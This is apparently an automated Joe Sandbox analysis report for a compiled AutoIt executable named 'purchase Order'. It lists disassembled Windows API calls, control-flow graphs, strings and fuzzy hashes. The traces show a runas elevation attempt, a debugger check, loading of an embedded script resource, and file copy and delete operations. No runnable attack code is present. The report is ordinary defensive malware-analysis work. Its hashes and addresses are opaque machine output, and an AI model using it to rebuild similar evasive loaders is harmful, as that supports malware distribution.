                                                        • Instruction Fuzzy Hash: F8324775A022298BCB348F15DC81AE9B7B5FF4A314F1841E9E41AE7A91D7309EC1CF52

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00C43AA3,?), ref: 00C43D45
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,00C43AA3,?), ref: 00C43D57
                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,00D01148,00D01130,?,?,?,?,00C43AA3,?), ref: 00C43DC8
                                                          • Part of subcall function 00C46430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C43DEE,00D01148,?,?,?,?,?,00C43AA3,?), ref: 00C46471
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,00C43AA3,?), ref: 00C43E48
                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00CF28F4,00000010), ref: 00CB1CCE
                                                        • SetCurrentDirectoryW.KERNEL32(?,00D01148,?,?,?,?,?,00C43AA3,?), ref: 00CB1D06
                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CDDAB4,00D01148,?,?,?,?,?,00C43AA3,?), ref: 00CB1D89
                                                        • ShellExecuteW.SHELL32(00000000,?,?,?,?,00C43AA3), ref: 00CB1D90
                                                          • Part of subcall function 00C43E6E: GetSysColorBrush.USER32(0000000F), ref: 00C43E79
                                                          • Part of subcall function 00C43E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00C43E88
                                                          • Part of subcall function 00C43E6E: LoadIconW.USER32(00000063), ref: 00C43E9E
                                                          • Part of subcall function 00C43E6E: LoadIconW.USER32(000000A4), ref: 00C43EB0
                                                          • Part of subcall function 00C43E6E: LoadIconW.USER32(000000A2), ref: 00C43EC2
                                                          • Part of subcall function 00C43E6E: RegisterClassExW.USER32(?), ref: 00C43F30
                                                          • Part of subcall function 00C436B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,ICTRLCREATETREEVIEW,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C436E6
                                                          • Part of subcall function 00C436B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C43707
                                                          • Part of subcall function 00C436B8: ShowWindow.USER32(00000000,?,?,?,?,00C43AA3,?), ref: 00C4371B
                                                          • Part of subcall function 00C436B8: ShowWindow.USER32(00000000,?,?,?,?,00C43AA3,?), ref: 00C43724
                                                          • Part of subcall function 00C44FFC: _memset.LIBCMT ref: 00C45022
                                                          • Part of subcall function 00C44FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C450CB
                                                        Strings
                                                        • This is a third-party compiled AutoIt script., xrefs: 00CB1CC8
                                                        • runas, xrefs: 00CB1D84
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                        • API String ID: 438480954-3287110873
                                                        • Opcode ID: 5a8b3104c94ea69bb9c60cb82b9dbd6fa85863f8c35a139b9f924bb7c42e66f0
                                                        • Instruction ID: cbd51358463b8bf24988a72cd3d3ac1ad8bc03ac22736c577b4bb3e84defe0f4
                                                        • Opcode Fuzzy Hash: 5a8b3104c94ea69bb9c60cb82b9dbd6fa85863f8c35a139b9f924bb7c42e66f0
                                                        • Instruction Fuzzy Hash: 54510634A05389AFCF15EBB0DC45FED7B75BB59700F044069F616A22E2DA704A49EB32

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1138 c5ddc0-c5de4f call c4d7f7 GetVersionExW call c46a63 call c5dfb4 call c46571 1147 c5de55-c5de56 1138->1147 1148 cb24c8-cb24cb 1138->1148 1151 c5de92-c5dea2 call c5df77 1147->1151 1152 c5de58-c5de63 1147->1152 1149 cb24cd 1148->1149 1150 cb24e4-cb24e8 1148->1150 1154 cb24d0 1149->1154 1155 cb24ea-cb24f3 1150->1155 1156 cb24d3-cb24dc 1150->1156 1167 c5dea4-c5dec1 GetCurrentProcess call c5df5f 1151->1167 1168 c5dec7-c5dee1 1151->1168 1157 cb244e-cb2454 1152->1157 1158 c5de69-c5de6b 1152->1158 1154->1156 1155->1154 1164 cb24f5-cb24f8 1155->1164 1156->1150 1162 cb245e-cb2464 1157->1162 1163 cb2456-cb2459 1157->1163 1159 cb2469-cb2475 1158->1159 1160 c5de71-c5de74 1158->1160 1169 cb247f-cb2485 1159->1169 1170 cb2477-cb247a 1159->1170 1165 cb2495-cb2498 1160->1165 1166 c5de7a-c5de89 1160->1166 1162->1151 1163->1151 1164->1156 1165->1151 1171 cb249e-cb24b3 1165->1171 1172 cb248a-cb2490 1166->1172 1173 c5de8f 1166->1173 1167->1168 1190 c5dec3 1167->1190 1175 c5df31-c5df3b GetSystemInfo 1168->1175 1176 c5dee3-c5def7 call c5e00c 1168->1176 1169->1151 1170->1151 1177 cb24bd-cb24c3 1171->1177 1178 cb24b5-cb24b8 1171->1178 1172->1151 1173->1151 1180 c5df0e-c5df1a 1175->1180 1185 c5df29-c5df2f GetSystemInfo 1176->1185 1186 c5def9-c5df01 call c5dff4 GetNativeSystemInfo 1176->1186 1177->1151 1178->1151 1182 c5df21-c5df26 1180->1182 1183 c5df1c-c5df1f FreeLibrary 1180->1183 1183->1182 1189 c5df03-c5df07 1185->1189 1186->1189 1189->1180 1192 c5df09-c5df0c FreeLibrary 1189->1192 1190->1168 1192->1180
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 00C5DDEC
                                                        • GetCurrentProcess.KERNEL32(00000000,00CDDC38,?,?), ref: 00C5DEAC
                                                        • GetNativeSystemInfo.KERNELBASE(?,00CDDC38,?,?), ref: 00C5DF01
                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00C5DF0C
                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00C5DF1F
                                                        • GetSystemInfo.KERNEL32(?,00CDDC38,?,?), ref: 00C5DF29
                                                        • GetSystemInfo.KERNEL32(?,00CDDC38,?,?), ref: 00C5DF35
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                        • String ID:
                                                        • API String ID: 3851250370-0
                                                        • Opcode ID: cf7b785ea318da92eb8540243dfae4be301dee7fe06a7bed97c886967fb0c9e6
                                                        • Instruction ID: 9b1d834bfc98393688e1b0d84e06f137a6b722cd6144f72dcfaa9ab382160501
                                                        • Opcode Fuzzy Hash: cf7b785ea318da92eb8540243dfae4be301dee7fe06a7bed97c886967fb0c9e6
                                                        • Instruction Fuzzy Hash: 8961A17580A384CBCF25CF6898C15ED7FB46F29301F1949D9DC469F207C6248A8DCB6A

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1210 c4406b-c44083 CreateStreamOnHGlobal 1211 c44085-c4409c FindResourceExW 1210->1211 1212 c440a3-c440a6 1210->1212 1213 c440a2 1211->1213 1214 cb4f16-cb4f25 LoadResource 1211->1214 1213->1212 1214->1213 1215 cb4f2b-cb4f39 SizeofResource 1214->1215 1215->1213 1216 cb4f3f-cb4f4a LockResource 1215->1216 1216->1213 1217 cb4f50-cb4f6e 1216->1217 1217->1213
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00C4449E,?,?,00000000,00000001), ref: 00C4407B
                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C4449E,?,?,00000000,00000001), ref: 00C44092
                                                        • LoadResource.KERNEL32(?,00000000,?,?,00C4449E,?,?,00000000,00000001,?,?,?,?,?,?,00C441FB), ref: 00CB4F1A
                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00C4449E,?,?,00000000,00000001,?,?,?,?,?,?,00C441FB), ref: 00CB4F2F
                                                        • LockResource.KERNEL32(00C4449E,?,?,00C4449E,?,?,00000000,00000001,?,?,?,?,?,?,00C441FB,00000000), ref: 00CB4F42
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                        • String ID: SCRIPT
                                                        • API String ID: 3051347437-3967369404
                                                        • Opcode ID: e1e8edac7c489ca8c8872860c45781f9c7c89e91b328e5116216af8a83f5ff5c
                                                        • Instruction ID: afea661714368e57fba5f87d6704eb423ff6b5920bdde9bbb39401779ce69da5
                                                        • Opcode Fuzzy Hash: e1e8edac7c489ca8c8872860c45781f9c7c89e91b328e5116216af8a83f5ff5c
                                                        • Instruction Fuzzy Hash: E1113C71200701BFE7258B66EC49F67BBB9EBC5B51F20417DFA12962A0DB71DD00CA60
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,00CB2F49), ref: 00C86CB9
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00C86CCA
                                                        • FindClose.KERNEL32(00000000), ref: 00C86CDA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: FileFind$AttributesCloseFirst
                                                        • String ID:
                                                        • API String ID: 48322524-0
                                                        • Opcode ID: 1a5fee2b72a7b8d8e0e959944b534f311a2710f134d5f9319715f8d4d82b4da4
                                                        • Instruction ID: e1cae6d01f0b6c30af6c5aeb8982e09cdbfd228234c0c214861200437f1a82bc
                                                        • Opcode Fuzzy Hash: 1a5fee2b72a7b8d8e0e959944b534f311a2710f134d5f9319715f8d4d82b4da4
                                                        • Instruction Fuzzy Hash: 4EE048318145155B82107738EC0D9ED776CDB0533DF244715F576C11D0E770DA4446DA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throwstd::exception::exception
                                                        • String ID: @
                                                        • API String ID: 3728558374-2766056989
                                                        • Opcode ID: ee05877403f15e62faec70e1c7a616e815fb0657cd3ddec1c4221d74a54431fc
                                                        • Instruction ID: 5d4ca01ea43435cf7553da03be6aada79322e92f5c6485c2e8af5392b9a809cc
                                                        • Opcode Fuzzy Hash: ee05877403f15e62faec70e1c7a616e815fb0657cd3ddec1c4221d74a54431fc
                                                        • Instruction Fuzzy Hash: 4472DF38D042089FCF14DF94C885ABEB7B5FF44341F14815AEC16AB291D770AE89DB95
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID:
                                                        • API String ID: 3964851224-0
                                                        • Opcode ID: 65d0092cc76e28328c44b845c6cde1a63cc44143a1260a0975a46aa94afaf950
                                                        • Instruction ID: f61ae4e5c50a89f0a912d9129a6583af2e29117c20627a31ff4c7c4050ba3855
                                                        • Opcode Fuzzy Hash: 65d0092cc76e28328c44b845c6cde1a63cc44143a1260a0975a46aa94afaf950
                                                        • Instruction Fuzzy Hash: DD929A746083418FD724DF18C484B6ABBE0FF88344F14885DE99A8B362D771EE89DB56
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C4E959
                                                        • timeGetTime.WINMM ref: 00C4EBFA
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C4ED2E
                                                        • TranslateMessage.USER32(?), ref: 00C4ED3F
                                                        • DispatchMessageW.USER32(?), ref: 00C4ED4A
                                                        • LockWindowUpdate.USER32(00000000), ref: 00C4ED79
                                                        • DestroyWindow.USER32 ref: 00C4ED85
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C4ED9F
                                                        • Sleep.KERNEL32(0000000A), ref: 00CB5270
                                                        • TranslateMessage.USER32(?), ref: 00CB59F7
                                                        • DispatchMessageW.USER32(?), ref: 00CB5A05
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CB5A19
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                        • API String ID: 2641332412-570651680
                                                        • Opcode ID: 67ebdc4b1f81a2bb31274a04d7104715cc6caf30ce2ec3c65f5d1ca4a7fff656
                                                        • Instruction ID: 78882e42103415b1ad98103b7cae3f12625604a31f7a04f1371f732d801848cb
                                                        • Opcode Fuzzy Hash: 67ebdc4b1f81a2bb31274a04d7104715cc6caf30ce2ec3c65f5d1ca4a7fff656
                                                        • Instruction Fuzzy Hash: BE62A170508340DFEB24DF24C885BAA77E4BF44304F19497DF99A8B292DB71D988DB62
                                                        APIs
                                                        • ___createFile.LIBCMT ref: 00C75EC3
                                                        • ___createFile.LIBCMT ref: 00C75F04
                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00C75F2D
                                                        • __dosmaperr.LIBCMT ref: 00C75F34
                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00C75F47
                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00C75F6A
                                                        • __dosmaperr.LIBCMT ref: 00C75F73
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00C75F7C
                                                        • __set_osfhnd.LIBCMT ref: 00C75FAC
                                                        • __lseeki64_nolock.LIBCMT ref: 00C76016
                                                        • __close_nolock.LIBCMT ref: 00C7603C
                                                        • __chsize_nolock.LIBCMT ref: 00C7606C
                                                        • __lseeki64_nolock.LIBCMT ref: 00C7607E
                                                        • __lseeki64_nolock.LIBCMT ref: 00C76176
                                                        • __lseeki64_nolock.LIBCMT ref: 00C7618B
                                                        • __close_nolock.LIBCMT ref: 00C761EB
                                                          • Part of subcall function 00C6EA9C: CloseHandle.KERNELBASE(00000000,00CEEEF4,00000000,?,00C76041,00CEEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00C6EAEC
                                                          • Part of subcall function 00C6EA9C: GetLastError.KERNEL32(?,00C76041,00CEEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00C6EAF6
                                                          • Part of subcall function 00C6EA9C: __free_osfhnd.LIBCMT ref: 00C6EB03
                                                          • Part of subcall function 00C6EA9C: __dosmaperr.LIBCMT ref: 00C6EB25
                                                          • Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E
                                                        • __lseeki64_nolock.LIBCMT ref: 00C7620D
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00C76342
                                                        • ___createFile.LIBCMT ref: 00C76361
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00C7636E
                                                        • __dosmaperr.LIBCMT ref: 00C76375
                                                        • __free_osfhnd.LIBCMT ref: 00C76395
                                                        • __invoke_watson.LIBCMT ref: 00C763C3
                                                        • __wsopen_helper.LIBCMT ref: 00C763DD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                        • String ID: @
                                                        • API String ID: 3896587723-2766056989
                                                        • Opcode ID: c2a041501d9cdb568c3e96e33a40b0b0edf45ea477d028f07e0e301bd12f8422
                                                        • Instruction ID: e79a5ad0d84fd12fa3d2432cefd27219076222ff7785eca16163a7db0399ca63
                                                        • Opcode Fuzzy Hash: c2a041501d9cdb568c3e96e33a40b0b0edf45ea477d028f07e0e301bd12f8422
                                                        • Instruction Fuzzy Hash: BA225771900A069FEF259F68DC85BBD7B71EB14314F28C228E5399B2E2C3758E50DB91

                                                        Control-flow Graph

                                                        APIs
                                                        • _wcscpy.LIBCMT ref: 00C8FA96
                                                        • _wcschr.LIBCMT ref: 00C8FAA4
                                                        • _wcscpy.LIBCMT ref: 00C8FABB
                                                        • _wcscat.LIBCMT ref: 00C8FACA
                                                        • _wcscat.LIBCMT ref: 00C8FAE8
                                                        • _wcscpy.LIBCMT ref: 00C8FB09
                                                        • __wsplitpath.LIBCMT ref: 00C8FBE6
                                                        • _wcscpy.LIBCMT ref: 00C8FC0B
                                                        • _wcscpy.LIBCMT ref: 00C8FC1D
                                                        • _wcscpy.LIBCMT ref: 00C8FC32
                                                        • _wcscat.LIBCMT ref: 00C8FC47
                                                        • _wcscat.LIBCMT ref: 00C8FC59
                                                        • _wcscat.LIBCMT ref: 00C8FC6E
                                                          • Part of subcall function 00C8BFA4: _wcscmp.LIBCMT ref: 00C8C03E
                                                          • Part of subcall function 00C8BFA4: __wsplitpath.LIBCMT ref: 00C8C083
                                                          • Part of subcall function 00C8BFA4: _wcscpy.LIBCMT ref: 00C8C096
                                                          • Part of subcall function 00C8BFA4: _wcscat.LIBCMT ref: 00C8C0A9
                                                          • Part of subcall function 00C8BFA4: __wsplitpath.LIBCMT ref: 00C8C0CE
                                                          • Part of subcall function 00C8BFA4: _wcscat.LIBCMT ref: 00C8C0E4
                                                          • Part of subcall function 00C8BFA4: _wcscat.LIBCMT ref: 00C8C0F7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                        • API String ID: 2955681530-2806939583
                                                        • Opcode ID: 7a994ab682c0d49097016bb4914902a4d32e0d4d6fdae3469d79c681fc498b9b
                                                        • Instruction ID: f245d0572f19d37e4d5c2361a9febfe1131ed040787e5c56e3ed269f2e42c8cd
                                                        • Opcode Fuzzy Hash: 7a994ab682c0d49097016bb4914902a4d32e0d4d6fdae3469d79c681fc498b9b
                                                        • Instruction Fuzzy Hash: D291AF72504205AFCB20EF50C881F9BB3E8BF84314F00496DF999972A2DB30EA45DB96

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00C43F86
                                                        • RegisterClassExW.USER32(00000030), ref: 00C43FB0
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C43FC1
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00C43FDE
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C43FEE
                                                        • LoadIconW.USER32(000000A9), ref: 00C44004
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C44013
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: f545caabb2903377e1c7f6ce3ef651bdc10e72b8e250636b149f2a544ce217bb
                                                        • Instruction ID: 405f8bcf493733492e6b148d80575bebfaa9b93e93f6ca21f28ad75bac3e81d3
                                                        • Opcode Fuzzy Hash: f545caabb2903377e1c7f6ce3ef651bdc10e72b8e250636b149f2a544ce217bb
                                                        • Instruction Fuzzy Hash: 6F2197B9D00319AFDB409FA5EC89BCDBBB4FB08704F00422AF619E62A0D7B545448FA5

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00C8BDB4: __time64.LIBCMT ref: 00C8BDBE
                                                          • Part of subcall function 00C44517: _fseek.LIBCMT ref: 00C4452F
                                                        • __wsplitpath.LIBCMT ref: 00C8C083
                                                          • Part of subcall function 00C61DFC: __wsplitpath_helper.LIBCMT ref: 00C61E3C
                                                        • _wcscpy.LIBCMT ref: 00C8C096
                                                        • _wcscat.LIBCMT ref: 00C8C0A9
                                                        • __wsplitpath.LIBCMT ref: 00C8C0CE
                                                        • _wcscat.LIBCMT ref: 00C8C0E4
                                                        • _wcscat.LIBCMT ref: 00C8C0F7
                                                        • _wcscmp.LIBCMT ref: 00C8C03E
                                                          • Part of subcall function 00C8C56D: _wcscmp.LIBCMT ref: 00C8C65D
                                                          • Part of subcall function 00C8C56D: _wcscmp.LIBCMT ref: 00C8C670
                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C8C2A1
                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C8C338
                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C8C34E
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C8C35F
                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C8C371
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
